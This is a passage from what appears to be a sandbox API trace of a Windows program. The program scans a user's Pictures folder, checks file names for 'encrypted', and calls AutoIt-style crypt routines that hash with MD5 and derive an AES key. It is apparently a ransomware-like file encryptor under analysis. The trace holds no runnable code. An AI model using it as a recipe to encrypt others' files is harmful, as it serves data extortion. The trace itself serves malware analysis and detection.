(Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.219] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.219] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.219] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.219] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.219] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.219] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.219] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.219] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.219] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.219] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46b1d10, ftCreationTime.dwHighDateTime=0x1d5bebe, ftLastAccessTime.dwLowDateTime=0x76997d50, ftLastAccessTime.dwHighDateTime=0x1d5c486, ftLastWriteTime.dwLowDateTime=0x76997d50, ftLastWriteTime.dwHighDateTime=0x1d5c486, nFileSizeHigh=0x0, nFileSizeLow=0x131c1, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="61Ot9 dm-iOBUGP.jpg", cAlternateFileName="61OT9D~1.JPG")) returned 0x7c2240 [0039.219] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.219] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.219] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.219] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.220] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.220] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.220] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.220] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.220] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.220] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.220] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.220] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.220] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.220] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.220] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.220] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.220] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0039.220] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.220] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0039.221] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.221] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.221] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.221] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.221] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.221] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.221] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.221] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.221] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.221] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.222] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.222] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.222] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.222] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.222] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.222] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.222] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.222] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.223] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.223] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.223] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.223] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.223] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.223] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.223] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.223] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.223] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.223] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.223] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.223] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.223] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0039.223] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.223] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.223] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.224] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0039.224] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.224] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0039.224] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.224] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0039.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0039.224] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.224] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.224] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.226] HeapFree (in: hHeap=0x770000, 